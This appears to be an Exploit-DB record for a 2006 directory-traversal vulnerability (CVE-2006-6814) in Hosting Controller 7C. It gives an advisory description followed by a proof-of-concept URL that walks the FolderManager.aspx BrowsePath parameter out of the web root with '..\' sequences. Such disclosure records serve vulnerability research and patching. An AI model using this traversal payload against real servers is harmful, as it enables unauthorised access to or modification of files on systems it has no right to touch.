Hosting Controller 7C FolderManager.ASPX Directory Traversal Vulnerability

2006-12-27T00:00:00
ID EDB-ID:29357
Type exploitdb
Reporter KAPDA
Modified 2006-12-27T00:00:00

Description

Hosting Controller 7C FolderManager.ASPX Directory Traversal Vulnerability. CVE-2006-6814. Webapps exploit for asp platform

                                        
                                            source: http://www.securityfocus.com/bid/21786/info

Hosting Controller is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input. 

An attacker can exploit this issue to modify or retrieve arbitrary files in the context of the webserver process. This may aid in further attacks.

This issue affects version 7C; earlier versions may also be vulnerable.

http://www.example.com/FolderManager/FolderManager.aspx?BrowseLevel=1&BrowsePath=[SITE NORMAL PATH]\..\..\..\..\program%20files